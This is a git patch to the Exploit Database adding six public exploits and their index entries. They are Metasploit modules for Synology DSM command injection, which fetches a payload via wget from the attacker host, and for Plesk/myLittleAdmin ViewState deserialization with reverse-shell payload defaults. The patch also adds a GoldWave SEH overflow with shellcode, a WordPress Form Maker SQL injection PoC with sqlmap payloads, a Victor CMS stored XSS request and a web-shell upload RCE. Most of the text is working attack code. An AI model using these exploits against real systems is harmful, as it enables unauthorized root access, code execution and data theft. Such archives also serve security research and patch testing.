From 4fbd3630c8dbd4ddfec45d203f1eb41e26aee87c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 26 May 2020 05:01:56 +0000 Subject: [PATCH] DB: 2020-05-26 6 changes to exploits/shellcodes GoldWave - Buffer Overflow (SEH Unicode) Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit) Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit) Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated) Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting Online Discussion Forum Site 1.0 - Remote Code Execution --- exploits/hardware/remote/48514.rb | 209 ++++++++++++++++++++++++++++++ exploits/php/webapps/48509.txt | 56 ++++++++ exploits/php/webapps/48511.txt | 66 ++++++++++ exploits/php/webapps/48512.txt | 21 +++ exploits/windows/local/48510.py | 80 ++++++++++++ exploits/windows/remote/48513.rb | 209 ++++++++++++++++++++++++++++++ files_exploits.csv | 6 + 7 files changed, 647 insertions(+) create mode 100755 exploits/hardware/remote/48514.rb create mode 100644 exploits/php/webapps/48509.txt create mode 100644 exploits/php/webapps/48511.txt create mode 100644 exploits/php/webapps/48512.txt create mode 100755 exploits/windows/local/48510.py create mode 100755 exploits/windows/remote/48513.rb diff --git a/exploits/hardware/remote/48514.rb b/exploits/hardware/remote/48514.rb new file mode 100755 index 000000000..b10b45766 --- /dev/null +++ b/exploits/hardware/remote/48514.rb @@ -0,0 +1,209 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::FileDropper + + DEVICE_INFO_PATTERN = /major=(?\d+)&minor=(?\d+)&build=(?\d+) + &junior=\d+&unique=synology_\w+_(?[^&]+)/x.freeze + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Synology DiskStation Manager smart.cgi Remote Command Execution', + 'Description' => %q{ + This module exploits a vulnerability found in Synology DiskStation Manager (DSM) + versions < 5.2-5967-5, which allows the execution of arbitrary commands under root + privileges after website authentication. + The vulnerability is located in webman/modules/StorageManager/smart.cgi, which + allows appending of a command to the device to be scanned. However, the command + with drive is limited to 30 characters. A somewhat valid drive name is required, + thus /dev/sd is used, even though it doesn't exist. To circumvent the character + restriction, a wget input file is staged in /a, and executed to download our payload + to /b. From there the payload is executed. A wfsdelay is required to give time + for the payload to download, and the execution of it to run. + }, + 'Author' => + [ + 'Nigusu Kassahun', # Discovery + 'h00die' # metasploit module + ], + 'References' => + [ + [ 'CVE', '2017-15889' ], + [ 'EDB', '43190' ], + [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ], + [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ] + ], + 'Privileged' => true, + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'Platform' => ['python'], + 'Arch' => [ARCH_PYTHON], + 'Targets' => + [ + ['Automatic', {}] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'PrependMigrate' => true, + 'WfsDelay' => 10 + }, + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'Nov 08 2017' + ) + ) + + register_options( + [ + Opt::RPORT(5000), + OptString.new('TARGETURI', [true, 'The URI of the Synology Website', '/']), + OptString.new('USERNAME', [true, 'The Username for Synology', 'admin']), + OptString.new('PASSWORD', [true, 'The Password for Synology', '']) + ] + ) + + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]) + ] + end + + def check + vprint_status('Trying to detect installed version') + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'webman', 'info.cgi'), + 'vars_get' => { 'host' => '' } + }) + + if res && (res.code == 200) && res.body =~ DEVICE_INFO_PATTERN + version = "#{$LAST_MATCH_INFO[:major]}.#{$LAST_MATCH_INFO[:minor]}" + build = $LAST_MATCH_INFO[:build] + model = $LAST_MATCH_INFO[:model].sub(/^[a-z]+/) { |s| s[0].upcase } + model = "DS#{model}" unless model =~ /^[A-Z]/ + else + vprint_error('Detection failed') + return CheckCode::Unknown + end + + vprint_status("Model #{model} with version #{version}-#{build} detected") + + case version + when '3.0', '4.0', '4.1', '4.2', '4.3', '5.0', '5.1' + return CheckCode::Appears + when '5.2' + return CheckCode::Appears if build < '5967-5' + end + + CheckCode::Safe + end + + def on_request_uri(cli, _request, cookie, token) + print_good('HTTP Server request received, sending payload') + send_response(cli, payload.encoded) + print_status('Executing payload') + inject_request(cookie, token, 'python b') + end + + def inject_request(cookie, token, cmd = '') + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'webman', 'modules', 'StorageManager', 'smart.cgi'), + 'cookie' => cookie, + 'headers' => { + 'X-SYNO-TOKEN' => token + }, + 'vars_post' => { + 'action' => 'apply', + 'operation' => 'quick', + 'disk' => "/dev/sd`#{cmd}`" + } + }) + end + + def login + # If you try to debug login through the browser, you'll see that desktop.js calls + # ux-all.js to do an RSA encrypted login. + # Wowever in a stroke of luck Mrs. h00die caused + # a power sag while tracing/debugging the loging, causing the NAS to power off. + # when that happened, it failed to get the crypto vars, and defaulted to a + # non-encrypted login, which seems to work just fine. greetz Mrs. h00die! + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'webman', 'login.cgi'), + 'vars_get' => { 'enable_syno_token' => 'yes' }, + 'vars_post' => { + 'username' => datastore['USERNAME'], + 'passwd' => datastore['PASSWORD'], + 'OTPcode' => '', + '__cIpHeRtExT' => '', + 'client_time' => Time.now.to_i, + 'isIframeLogin' => 'yes' + } + }) + if res && %r{
(?.*)
}m =~ res.body + result = JSON.parse(json) + + fail_with(Failure::BadConfig, 'Incorrect Username/Password') if result['result'] == 'error' + if result['result'] == 'success' + return res.get_cookies, result['SynoToken'] + end + + fail_with(Failure::Unknown, "Unknown response: #{result}") + end + end + + def exploit + unless check == CheckCode::Appears + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if datastore['SRVHOST'] == '0.0.0.0' + fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') + end + + begin + print_status('Attempting Login') + cookie, token = login + + start_service({ 'Uri' => { + 'Proc' => proc do |cli, req| + on_request_uri(cli, req, cookie, token) + end, + 'Path' => '/' + } }) + + print_status('Cleaning env') + inject_request(cookie, token, cmd = 'rm -rf /a') + inject_request(cookie, token, cmd = 'rm -rf b') + command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//) + command_space = 22 - "echo -n ''>>/a".length + command_space -= 1 + command.each_slice(command_space) do |a| + a = a.join('') + vprint_status("Staging wget with: echo -n '#{a}'>>/a") + inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a") + end + print_status('Requesting payload pull') + register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b') + register_file_for_cleanup('/a') + inject_request(cookie, token, cmd = 'wget -i /a -O b') + # at this point we let the HTTP server call the last stage + # wfsdelay should be long enough to hold out for everything to download and run + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + + end +end \ No newline at end of file diff --git a/exploits/php/webapps/48509.txt b/exploits/php/webapps/48509.txt new file mode 100644 index 000000000..1db9ad318 --- /dev/null +++ b/exploits/php/webapps/48509.txt @@ -0,0 +1,56 @@ +# Exploit Title: Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated) +# Exploit Author: SunCSR (Sun* Cyber Security Research) +# Date: 2020 - 5 - 22 +# Vender Homepage: https://help.10web.io/ +# Version: <= 5.4.1 +# Tested on: Ubuntu 18.04 + +Description: +SQL injection in the Form Maker by 10Web WordPress Plugin before 5.4.1 +exists via the /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" s +parameter. + +Poc: +GET /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" HTTP/1.1 +Host: test-wp.com +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 +Firefox/76.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: +wordpress_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C96d43f4ee5cf009365c9722f461d538f96a62637094759cb6fb7a9f54edac171; +wordpress_test_cookie=WP+Cookie+check; +wordpress_logged_in_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C9a63283d84855ed6eeae8e4b5f3a405fba003ddd15748bf5cdca5caaca228a19; +wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1590140574; +PHPSESSID=5bpdr8tbj5furvccoadjjj2sgb +Upgrade-Insecure-Requests: 1 + +SQLMap using: +sqlmap -u ' +http://test-wp.com:80/wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=123' +--cookie='wordpress_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C96d43f4ee5cf009365c9722f461d538f96a62637094759cb6fb7a9f54edac171;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C9a63283d84855ed6eeae8e4b5f3a405fba003ddd15748bf5cdca5caaca228a19;wp-settings-1=libraryContent%3Dbrowse;wp-settings-time-1=1590140574;PHPSESSID=5bpdr8tbj5furvccoadjjj2sgb' + +Parameter: s (GET) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) + Payload: page=blocked_ips_fm&s=-1027" OR 8913=8913# + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (FLOOR) + Payload: page=blocked_ips_fm&s=123" AND (SELECT 2867 FROM(SELECT +COUNT(*),CONCAT(0x717a707871,(SELECT +(ELT(2867=2867,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TxQH + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: page=blocked_ips_fm&s=123" AND SLEEP(5)-- oPEC +--- +[17:20:17] [INFO] the back-end DBMS is MySQL +web server operating system: Linux Ubuntu +web application technology: Apache 2.4.29 +back-end DBMS: MySQL >= 5.0 \ No newline at end of file diff --git a/exploits/php/webapps/48511.txt b/exploits/php/webapps/48511.txt new file mode 100644 index 000000000..8422cf94a --- /dev/null +++ b/exploits/php/webapps/48511.txt @@ -0,0 +1,66 @@ +# Exploit Title: Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting +# Google Dork: N/A +# Date: 2020-05-23 +# Exploit Author: Nitya Nand +# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite +# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip +# Version: 1.0 +# Tested on: Linux +# CVE : N/A + + +Description: The POST parameter 'user_name', 'user_firstname', 'user_lastname' is vulnerable to persistent cross site scripting Payload: +POST /phpmaster/admin/users.php?source=add_user HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/phpmaster/admin/users.php?source=add_user +Content-Type: multipart/form-data; boundary=---------------------------515906178311115682892435428 +Content-Length: 417375 +Connection: close +Cookie: PHPSESSID=8810e038f92cd7c711ee8b95db1dcacb +Upgrade-Insecure-Requests: 1 + +-----------------------------515906178311115682892435428 + +Content-Disposition: form-data; name="user_name" +"> + +-----------------------------515906178311115682892435428 + +Content-Disposition: form-data; name="user_firstname" +"> + +-----------------------------515906178311115682892435428 + +Content-Disposition: form-data; name="user_lastname" +"> + +-----------------------------515906178311115682892435428 + +Content-Disposition: form-data; name="user_image"; filename="9400.jpg" +Content-Type: image/jpeg + +-----------------------------515906178311115682892435428 + +Content-Disposition: form-data; name="user_role" +User + +-----------------------------515906178311115682892435428 + +Content-Disposition: form-data; name="user_email" +abc@gmail.com + +-----------------------------515906178311115682892435428 + +Content-Disposition: form-data; name="user_password" +1234 + +-----------------------------515906178311115682892435428 + +Content-Disposition: form-data; name="create_user" + +Add User +-----------------------------515906178311115682892435428-- \ No newline at end of file diff --git a/exploits/php/webapps/48512.txt b/exploits/php/webapps/48512.txt new file mode 100644 index 000000000..4391c1c67 --- /dev/null +++ b/exploits/php/webapps/48512.txt @@ -0,0 +1,21 @@ +# Exploit Title: Online Discussion Forum Site 1.0 - Remote Code Execution +# Google Dork: N/A +# Date: 2020-05-24 +# Exploit Author: Selim Enes 'Enesdex' Karaduman +# Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site +# Version: 1.0 (REQUIRED) +# Tested on: Windows 10 / Wamp Server +# CVE : N/A +Go to http://localhost/Online%20Discussion%20Forum%20Site/register.php register page to sign up +Then fill other fields and upload the shell.php with following PHP-shell-code + + + +After the registration process is completed go to the following page and execute the os command via uploaded shell +http://localhost/Online%20Discussion%20Forum%20Site/ups/shell.php?cmd=$THECODE-YOU-WANT-TO-EXECUTE + +Any unauthenticated attacker is able to execute arbitrary os command \ No newline at end of file diff --git a/exploits/windows/local/48510.py b/exploits/windows/local/48510.py new file mode 100755 index 000000000..6b79fff26 --- /dev/null +++ b/exploits/windows/local/48510.py @@ -0,0 +1,80 @@ +# Exploit Title: GoldWave 5.70 – Buffer Overflow (SEH Unicode) +# Date: 2020-05-14 +# Exploit Author: Andy Bowden +# Vendor Homepage: https://www.goldwave.com/ +# Version: 5.70 +# Download Link: http://goldwave.com//downloads/gwave570.exe +# Tested on: Windows 10 x86 + +# PoC +# 1. generate crash.txt, copy contents to clipboard +# 2. open gold wave app +# 3. select File, Open URL... +# 4. paste contents from clipboard after 'http://' +# 5. select OK + +f = open("crash.txt", "wb") + +buf = b"" +buf += b"\x41" * 1019 +buf += b"\x71\x71" # Unicode NOP +buf += b"\xB3\x48" # 0x004800b3 | pop ecx, pop ebp, ret + +#realigning stack +buf += b"\x75" # Unicode NOP +buf += b"\x54" # Push ESP +buf += b"\x75" # Unicode NOP +buf += b"\x58" # POP EAX +buf += b"\x75" # Unicode NOP +buf += b"\x05\xFF\x10" # ADD EAX, +buf += b"\x75" # Unicode NOP +buf += b"\x2d\xEA\x10" # SUB EAX, +buf += b"\x75" +buf += b"\x71" * 595 + +#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper +BufferRegister=EAX -f python +buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51" +buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44" +buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41" +buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50" +buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31" +buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50" +buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49" +buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51" +buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42" +buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b" +buf += b"\x4c\x59\x58\x35\x32\x4b\x50\x4b\x50\x4d\x30\x31\x50" +buf += b"\x43\x59\x4b\x35\x50\x31\x39\x30\x42\x44\x54\x4b\x50" +buf += b"\x50\x30\x30\x54\x4b\x42\x32\x4c\x4c\x54\x4b\x31\x42" +buf += b"\x4c\x54\x54\x4b\x34\x32\x4f\x38\x4c\x4f\x48\x37\x50" +buf += b"\x4a\x4f\x36\x50\x31\x4b\x4f\x36\x4c\x4f\x4c\x31\x51" +buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x39\x31\x38\x4f\x4c" +buf += b"\x4d\x4d\x31\x59\x37\x4a\x42\x4a\x52\x42\x32\x51\x47" +buf += b"\x34\x4b\x50\x52\x4c\x50\x34\x4b\x30\x4a\x4f\x4c\x54" +buf += b"\x4b\x30\x4c\x4e\x31\x34\x38\x4b\x33\x30\x48\x4b\x51" +buf += b"\x4a\x31\x30\x51\x54\x4b\x50\x59\x4d\x50\x4d\x31\x5a" +buf += b"\x33\x44\x4b\x31\x39\x4c\x58\x39\x53\x4e\x5a\x30\x49" +buf += b"\x44\x4b\x4e\x54\x34\x4b\x4d\x31\x4a\x36\x4e\x51\x4b" +buf += b"\x4f\x36\x4c\x59\x31\x38\x4f\x4c\x4d\x4b\x51\x49\x37" +buf += b"\x4e\x58\x4b\x30\x52\x55\x4b\x46\x4c\x43\x43\x4d\x4c" +buf += b"\x38\x4f\x4b\x43\x4d\x4e\x44\x42\x55\x5a\x44\x30\x58" +buf += b"\x54\x4b\x52\x38\x4e\x44\x4b\x51\x59\x43\x31\x56\x34" +buf += b"\x4b\x4c\x4c\x50\x4b\x34\x4b\x50\x58\x4d\x4c\x4b\x51" +buf += b"\x39\x43\x44\x4b\x4d\x34\x44\x4b\x4b\x51\x4a\x30\x35" +buf += b"\x39\x30\x44\x4d\x54\x4d\x54\x31\x4b\x51\x4b\x53\x31" +buf += b"\x50\x59\x50\x5a\x32\x31\x4b\x4f\x49\x50\x31\x4f\x31" +buf += b"\x4f\x31\x4a\x34\x4b\x4e\x32\x4a\x4b\x54\x4d\x51\x4d" +buf += b"\x51\x5a\x4b\x51\x54\x4d\x54\x45\x46\x52\x4b\x50\x4d" +buf += b"\x30\x4b\x50\x32\x30\x33\x38\x4e\x51\x34\x4b\x42\x4f" +buf += b"\x34\x47\x4b\x4f\x49\x45\x57\x4b\x5a\x50\x38\x35\x45" +buf += b"\x52\x52\x36\x42\x48\x37\x36\x34\x55\x47\x4d\x55\x4d" +buf += b"\x4b\x4f\x4a\x35\x4f\x4c\x4c\x46\x33\x4c\x4c\x4a\x43" +buf += b"\x50\x4b\x4b\x39\x50\x33\x45\x4d\x35\x47\x4b\x50\x47" +buf += b"\x4e\x33\x42\x52\x42\x4f\x31\x5a\x4b\x50\x50\x53\x4b" +buf += b"\x4f\x49\x45\x52\x43\x53\x31\x42\x4c\x53\x33\x4e\x4e" +buf += b"\x32\x45\x34\x38\x53\x35\x4b\x50\x41\x41" +buf += b"\x44" * (5000 - len(buf)) + +f.write(buf) +f.close() \ No newline at end of file diff --git a/exploits/windows/remote/48513.rb b/exploits/windows/remote/48513.rb new file mode 100755 index 000000000..fb4160ef2 --- /dev/null +++ b/exploits/windows/remote/48513.rb @@ -0,0 +1,209 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + # + VIEWSTATE_GENERATOR = 'CA0B0334'.freeze + + # + VIEWSTATE_VALIDATION_KEY = + "\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf" \ + "\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a" \ + "\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e" \ + "\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf".freeze + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::AutoCheck + include Msf::Exploit::ViewState + include Msf::Exploit::CmdStager + include Msf::Exploit::Powershell + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization', + 'Description' => %q{ + This module exploits a ViewState .NET deserialization vulnerability in + web-based MS SQL Server management tool myLittleAdmin, for version 3.8 + and likely older versions, due to hardcoded parameters in + the web.config file for ASP.NET. + + Popular web hosting control panel Plesk offers myLittleAdmin as an + optional component that is selected automatically during "full" + installation. This exploit caters to the Plesk target, though it + should work fine against a standalone myLittleAdmin setup. + + Successful exploitation results in code execution as the user running + myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as + the "SQL Admin MSSQL anonymous account." + + Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8. + }, + 'Author' => [ + # Reported to SSD (SecuriTeam) by an anonymous researcher + # Publicly disclosed by Noam Rathaus of SSD (SecuriTeam) + 'Spencer McIntyre', # Inspiration + 'wvu' # Module + ], + 'References' => [ + ['CVE', '2020-13166'], + ['URL', 'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'], + ['URL', 'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw'] + ], + 'DisclosureDate' => '2020-05-15', # SSD (SecuriTeam) advisory + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], + 'Privileged' => false, + 'Targets' => [ + [ + 'Windows Command', + 'Arch' => ARCH_CMD, + 'Type' => :win_cmd, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' + } + ], + [ + 'Windows Dropper', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :win_dropper, + 'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs], + 'DefaultOptions' => { + 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest, + 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' + } + ], + [ + 'PowerShell Stager', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Type' => :psh_stager, + 'DefaultOptions' => { + 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' + } + ] + ], + 'DefaultTarget' => 2, + 'DefaultOptions' => { + 'SSL' => true, + 'WfsDelay' => 10 # First exploit attempt may be a little slow + }, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] + } + ) + ) + + register_options([ + Opt::RPORT(8401, true, 'The myLittleAdmin port (default for Plesk!)'), + OptString.new('TARGETURI', [true, 'Base path', '/']) + ]) + + # XXX: https://github.com/rapid7/metasploit-framework/issues/12963 + import_target_defaults + end + + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path) + ) + + unless res + return CheckCode::Unknown('Target did not respond to check request.') + end + + unless res.code == 200 && res.body.include?('myLittleAdmin for SQL Server') + return CheckCode::Unknown('Target is not running myLittleAdmin.') + end + + vprint_good("myLittleAdmin is running at #{full_uri}") + check_viewstate(res.get_html_document) + end + + def check_viewstate(html) + viewstate = html.at('//input[@id = "__VIEWSTATE"]/@value')&.text + + unless viewstate + return CheckCode::Detected("__VIEWSTATE not found, can't complete check.") + end + + @viewstate_generator = + html.at('//input[@id = "__VIEWSTATEGENERATOR"]/@value')&.text + + unless @viewstate_generator + print_warning('__VIEWSTATEGENERATOR not found, using known default value') + @viewstate_generator = VIEWSTATE_GENERATOR + end + + # ViewState generator needs to be a packed integer now + @viewstate_generator = [@viewstate_generator.to_i(16)].pack('V') + + we_can_sign_viewstate = can_sign_viewstate?( + viewstate, + extra: @viewstate_generator, + key: VIEWSTATE_VALIDATION_KEY + ) + + if we_can_sign_viewstate + return CheckCode::Vulnerable('We can sign our own ViewState.') + end + + CheckCode::Safe("We can't sign our own ViewState.") + end + + def exploit + # NOTE: Automatic check is implemented by the AutoCheck mixin + super + + print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") + + case target['Type'] + when :win_cmd + execute_command(payload.encoded) + when :win_dropper + execute_cmdstager + when :psh_stager + execute_command(cmd_psh_payload( + payload.encoded, + payload.arch.first, + remove_comspec: true + )) + end + end + + def execute_command(cmd, _opts = {}) + vprint_status("Serializing command: #{cmd}") + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'vars_post' => { + # This is the only parameter we need for successful exploitation! + '__VIEWSTATE' => generate_viewstate_payload( + cmd, + extra: @viewstate_generator, + key: VIEWSTATE_VALIDATION_KEY + ) + } + ) + + unless res && res.code == 302 && res.redirection.path == '/error/index.html' + fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}") + end + + print_good("Successfully executed command: #{cmd}") + end + +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c1debb4c8..8d75cda34 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11081,6 +11081,7 @@ id,file,description,date,author,type,platform,port 48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows, 48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows, 48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows, +48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -18157,6 +18158,8 @@ id,file,description,date,author,type,platform,port 48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple, 48491,exploits/php/remote/48491.rb,"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)",2020-05-19,Metasploit,remote,php, 48508,exploits/multiple/remote/48508.rb,"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)",2020-05-22,Metasploit,remote,multiple, +48513,exploits/windows/remote/48513.rb,"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)",2020-05-25,Metasploit,remote,windows, +48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42736,3 +42739,6 @@ id,file,description,date,author,type,platform,port 48500,exploits/multiple/webapps/48500.txt,"OpenEDX platform Ironwood 2.5 - Remote Code Execution",2020-05-21,"Daniel Monzón",webapps,multiple, 48504,exploits/php/webapps/48504.txt,"Dolibarr 11.0.3 - Persistent Cross-Site Scripting",2020-05-22,"Mehmet Kelepçe",webapps,php, 48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php, +48509,exploits/php/webapps/48509.txt,"Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php, +48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php, +48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php,